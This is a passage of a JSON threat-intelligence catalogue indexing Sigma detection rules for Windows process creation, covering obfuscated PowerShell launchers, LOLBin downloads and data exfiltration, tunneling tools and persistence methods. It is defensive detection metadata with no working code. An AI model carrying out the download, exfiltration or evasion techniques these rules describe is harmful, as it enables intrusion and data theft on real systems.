"https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_install_reg_debugger_backdoor.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.008" + ], + "creation_date": "2019/09/06", + "filename": "proc_creation_win_install_reg_debugger_backdoor.yml", + "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect an interactive AT job, which may be used as a form of privilege escalation.", + "uuid": "60fc936d-2eb0-4543-8a13-911c750a1dfc", + "value": "Interactive AT Job", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md", + "https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_interactive_at.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1053.002" + ], + "creation_date": "2019/10/24", + "filename": "proc_creation_win_interactive_at.yml", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "level": "high", + "falsepositive": [ + "Unlikely (at.exe deprecated as of Windows 8)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "uuid": "b222df08-0e07-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation CLIP+ Launcher", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_clip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/13", + "filename": "proc_creation_win_invoke_obfuscation_clip.yml", + "author": "Jonathan Cheong, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", + "uuid": "4bf943c6-5146-4273-98dd-e958fd1e3abf", + "value": "Invoke-Obfuscation Obfuscated IEX Invocation", + "meta": { + "refs": [ + "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_obfuscated_iex_commandline.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/11/08", + "filename": "proc_creation_win_invoke_obfuscation_obfuscated_iex_commandline.yml", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "uuid": "6c96fc76-0eb1-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation STDIN+ Launcher", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_stdin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/15", + "filename": "proc_creation_win_invoke_obfuscation_stdin.yml", + "author": "Jonathan Cheong, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "uuid": "27aec9c9-dbb0-4939-8422-1742242471d0", + "value": "Invoke-Obfuscation VAR+ Launcher", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_var.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/15", + "filename": "proc_creation_win_invoke_obfuscation_var.yml", + "author": "Jonathan Cheong, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "uuid": "7eedcc9d-9fdb-4d94-9c54-474e8affc0c7", + "value": "Invoke-Obfuscation COMPRESS OBFUSCATION", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_compress.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/18", + "filename": "proc_creation_win_invoke_obfuscation_via_compress.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "uuid": "056a7ee1-4853-4e67-86a0-3fd9ceed7555", + "value": "Invoke-Obfuscation RUNDLL LAUNCHER", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_rundll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/18", + "filename": "proc_creation_win_invoke_obfuscation_via_rundll.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "uuid": "9c14c9fa-1a63-4a64-8e57-d19280559490", + "value": "Invoke-Obfuscation Via Stdin", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_stdin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/12", + "filename": "proc_creation_win_invoke_obfuscation_via_stdin.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "uuid": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", + "value": "Invoke-Obfuscation Via Use Clip", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_use_clip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/09", + "filename": "proc_creation_win_invoke_obfuscation_via_use_clip.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "uuid": "ac20ae82-8758-4f38-958e-b44a3140ca88", + "value": "Invoke-Obfuscation Via Use MSHTA", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_use_mhsta.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/08", + "filename": "proc_creation_win_invoke_obfuscation_via_use_mhsta.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "uuid": "36c5146c-d127-4f85-8e21-01bf62355d5a", + "value": "Invoke-Obfuscation Via Use Rundll32", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/10/08", + "filename": "proc_creation_win_invoke_obfuscation_via_use_rundll32.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "uuid": "e9f55347-2928-4c06-88e5-1a7f8169942e", + "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_var.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/13", + "filename": "proc_creation_win_invoke_obfuscation_via_var.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", + "uuid": "d7654f02-e04b-4934-9838-65c46f187ebc", + "value": "IOX Tunneling Tool", + "meta": { + "refs": [ + "https://github.com/EddieIvan01/iox", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iox.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090" + ], + "creation_date": "2022/10/08", + "filename": "proc_creation_win_iox.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect the use of Jlaive to execute assemblies in a copied PowerShell", + "uuid": "0a99eb3e-1617-41bd-b095-13dc767f3def", + "value": "Jlaive Usage For Assembly Execution In-Memory", + "meta": { + "refs": [ + "https://jstnk9.github.io/jstnk9/research/Jlaive-Antivirus-Evasion-Tool", + "https://github.com/ch2sh/Jlaive", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_jlaive_batch_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ], + "creation_date": "2022/05/24", + "filename": "proc_creation_win_jlaive_batch_execution.yml", + "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Ldifde.exe with specific command line arguments to potentially load an LDIF file containing HTTP-based arguments.\nLdifde.exe is present, by default, on domain controllers and only requires user-level authentication to execute.\n", + "uuid": "6f535e01-ca1f-40be-ab8d-45b19c0c8b7f", + "value": "Suspicious Ldifde Command Usage", + "meta": { + "refs": [ + "https://twitter.com/0gtweet/status/1564968845726580736", + "https://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105", + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/09/02", + "filename": "proc_creation_win_ldifde_file_load.yml", + "author": "@gott_cyber", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects MSHTA.EXE spwaned by SVCHOST as seen in LethalHTA and described in report", + "uuid": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "value": "MSHTA Spwaned by SVCHOST", + "meta": { + "refs": [ + "https://codewhitesec.blogspot.com/2018/07/lethalhta.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lethalhta.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.005" + ], + "creation_date": "2018/06/07", + "filename": "proc_creation_win_lethalhta.yml", + "author": "Markus Neis", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Local accounts, System Owner/User discovery using operating systems utilities", + "uuid": "502b42de-4306-40b4-9596-6f590c81f073", + "value": "Local Accounts Discovery", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_local_system_owner_account_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "attack.t1087.001" + ], + "creation_date": "2019/10/21", + "filename": "proc_creation_win_local_system_owner_account_discovery.yml", + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate administrator or user enumerates local users for legitimate reason" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "uuid": "d85873ef-a0f8-4c48-a53a-6b621f11729d", + "value": "Use of LogMeIn Remote Access Software", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_logmein.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/02/11", + "filename": "proc_creation_win_logmein.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects creation or execution of UserInitMprLogonScript persistence method", + "uuid": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", + "value": "Logon Scripts (UserInitMprLogonScript)", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1037/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml" + ], + "tags": [ + "attack.t1037.001", + "attack.persistence" + ], + "creation_date": "2019/01/12", + "filename": "proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml", + "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", + "level": "high", + "falsepositive": [ + "Exclude legitimate logon scripts" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated.", + "uuid": "23daeb52-e6eb-493c-8607-c4f0246cb7d8", + "value": "New Lolbin Process by Office Applications", + "meta": { + "refs": [ + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml", + "https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A", + "https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbins_by_office_applications.yml" + ], + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ], + "creation_date": "2021/08/23", + "filename": "proc_creation_win_lolbins_by_office_applications.yml", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Michael Haag, Christopher Peacock @securepeacock (Update), SCYTHE @scythe_io (Update)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed.", + "uuid": "8a582fe2-0882-4b89-a82a-da6b2dc32937", + "value": "Lolbins Process Creation with WmiPrvse", + "meta": { + "refs": [ + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbins_with_wmiprvse_parent_process.yml" + ], + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ], + "creation_date": "2021/08/23", + "filename": "proc_creation_win_lolbins_with_wmiprvse_parent_process.yml", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "The \"AdPlus.exe\" binary that is part of the Windows SDK can be used as a lolbin to dump process memory and execute arbitrary commands", + "uuid": "2f869d59-7f6a-4931-992c-cce556ff2d53", + "value": "Use of Adplus.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/", + "https://twitter.com/nas_bench/status/1534916659676422152", + "https://twitter.com/nas_bench/status/1534915321856917506", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1003.001" + ], + "creation_date": "2022/06/09", + "filename": "proc_creation_win_lolbin_adplus.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate usage of Adplus" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Execute C# code with the Build Provider and proper folder structure in place.", + "uuid": "a01b8329-5953-4f73-ae2d-aa01e1f35f00", + "value": "Suspicious aspnet_compiler.exe Execution", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_aspnet_compiler.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ], + "creation_date": "2021/11/24", + "filename": "proc_creation_win_lolbin_aspnet_compiler.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Performs execution of specified file, can be used for defensive evasion.", + "uuid": "5edc2273-c26f-406c-83f3-f4d948e740dd", + "value": "Suspicious Subsystem for Linux Bash Execution", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Bash/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ], + "creation_date": "2021/11/24", + "filename": "proc_creation_win_lolbin_bash.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when a user downloads file by using CertOC.exe", + "uuid": "70ad0861-d1fe-491c-a45f-fa48148a300d", + "value": "Suspicious File Download via CertOC.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_certoc_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2022/05/16", + "filename": "proc_creation_win_lolbin_certoc_download.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties.", + "uuid": "53d4bb30-3f36-4e8a-b078-69d36c4a79ff", + "value": "Custom Class Execution via Xwizard", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2020/10/07", + "filename": "proc_creation_win_lolbin_class_exec_xwizard.yml", + "author": "Ensar \u015eamil, @sblmsrsn, @oscd_initiative", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "uuid": "a0459f02-ac51-4c09-b511-b8c9203fc429", + "value": "Execution via CL_Invocation.ps1", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", + "https://twitter.com/bohops/status/948061991012327424", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_invocation.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], + "creation_date": "2020/10/14", + "filename": "proc_creation_win_lolbin_cl_invocation.yml", + "author": "oscd.community, Natalia Shornikova", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of a Microsoft signed script to execute commands and bypassing AppLocker.", + "uuid": "c57872c7-614f-4d7f-a40d-b78c8df2d30d", + "value": "CL_LoadAssembly.ps1 Proxy Execution", + "meta": { + "refs": [ + "https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/", + "https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_loadassembly.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], + "creation_date": "2022/05/21", + "filename": "proc_creation_win_lolbin_cl_loadassembly.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of a Microsoft signed script to execute commands", + "uuid": "1e0e1a81-e79b-44bc-935b-ddb9c8006b3d", + "value": "CL_Mutexverifiers.ps1 Proxy Execution", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_mutexverifiers.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], + "creation_date": "2022/05/21", + "filename": "proc_creation_win_lolbin_cl_mutexverifiers.yml", + "author": "oscd.community, Natalia Shornikova, frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "lolbas Cmdl32 is use to download a payload to evade antivirus", + "uuid": "f37aba28-a9e6-4045-882c-d5004043b337", + "value": "Suspicious Cmdl32 Execution", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/", + "https://twitter.com/SwiftOnSecurity/status/1455897435063074824", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cmdl32.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" + ], + "creation_date": "2021/11/03", + "filename": "proc_creation_win_lolbin_cmdl32.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Upload file, credentials or data exfiltration with Binary part of Windows Defender", + "uuid": "1f0f6176-6482-4027-b151-00071af39d7e", + "value": "Suspicious ConfigSecurityPolicy Execution", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567" + ], + "creation_date": "2021/11/26", + "filename": "proc_creation_win_lolbin_configsecuritypolicy.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries can abuse of C:\\Windows\\System32\\gatherNetworkInfo.vbs script along with cscript.exe to gather information about the target", + "uuid": "575dce0c-8139-4e30-9295-1ee75969f7fe", + "value": "GatherNetworkInfo.vbs Script Usage", + "meta": { + "refs": [ + "https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cscript_gathernetworkinfo.yml" + ], + "tags": [ + "attack.discovery", + "attack.execution", + "attack.t1615", + "attack.t1059.005" + ], + "creation_date": "2022/01/03", + "filename": "proc_creation_win_lolbin_cscript_gathernetworkinfo.yml", + "author": "blueteamer8699", + "level": "medium", + "falsepositive": [ + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of CustomShellHost binary where the child isn't located in 'C:\\Windows\\explorer.exe'", + "uuid": "84b14121-9d14-416e-800b-f3b829c5a14d", + "value": "Suspicious CustomShellHost Execution", + "meta": { + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/180", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_customshellhost.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], + "creation_date": "2022/08/19", + "filename": "proc_creation_win_lolbin_customshellhost.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when a user performs data exfiltration by using DataSvcUtil.exe", + "uuid": "e290b10b-1023-4452-a4a9-eb31a9013b3a", + "value": "LOLBAS Data Exfiltration by DataSvcUtil.exe", + "meta": { + "refs": [ + "https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6", + "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe", + "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services", + "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services", + "https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567" + ], + "creation_date": "2021/09/30", + "filename": "proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml", + "author": "Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "DataSvcUtil.exe being used may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of DeviceCredentialDeployment to hide a process from view", + "uuid": "b8b1b304-a60f-4999-9a6e-c547bde03ffd", + "value": "DeviceCredentialDeployment Execution", + "meta": { + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/147", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/08/19", + "filename": "proc_creation_win_lolbin_device_credential_deployment.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.", + "uuid": "6b369ced-4b1d-48f1-b427-fdc0de0790bd", + "value": "Suspicious Diantz Alternate Data Stream Execution", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Diantz/", + 